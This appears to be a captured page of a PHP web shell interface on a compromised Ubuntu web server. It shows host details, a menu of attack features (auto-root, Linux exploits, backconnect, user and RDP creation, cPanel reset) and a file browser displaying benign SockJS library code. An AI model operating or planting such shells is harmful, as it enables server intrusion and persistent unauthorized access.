Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
sockjs /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
chunking-test.js
2.46
KB
-rw-r--r--
iframe.js
1.21
KB
-rw-r--r--
sockjs.js
7.86
KB
-rw-r--r--
trans-eventsource.js
1.85
KB
-rw-r--r--
trans-htmlfile.js
2.27
KB
-rw-r--r--
trans-jsonp.js
3.13
KB
-rw-r--r--
trans-websocket.js
7.33
KB
-rw-r--r--
trans-xhr.js
3.71
KB
-rw-r--r--
transport.js
11.93
KB
-rw-r--r--
utils.js
3.9
KB
-rw-r--r--
webjs.js
8.61
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : iframe.js
// Generated by CoffeeScript 1.12.7 (function() { var iframe_template, utils; utils = require('./utils'); iframe_template = "<!DOCTYPE html>\n<html>\n<head>\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" />\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />\n <script src=\"{{ sockjs_url }}\"></script>\n <script>\n document.domain = document.domain;\n SockJS.bootstrap_iframe();\n </script>\n</head>\n<body>\n <h2>Don't panic!</h2>\n <p>This is a SockJS hidden iframe. It's used for cross domain magic.</p>\n</body>\n</html>"; exports.app = { iframe: function(req, res) { var content, context, k, quoted_md5; context = { '{{ sockjs_url }}': this.options.sockjs_url }; content = iframe_template; for (k in context) { content = content.replace(k, context[k]); } quoted_md5 = '"' + utils.md5_hex(content) + '"'; if ('if-none-match' in req.headers && req.headers['if-none-match'] === quoted_md5) { res.statusCode = 304; return ''; } res.setHeader('Content-Type', 'text/html; charset=UTF-8'); res.setHeader('ETag', quoted_md5); return content; } }; }).call(this);
Close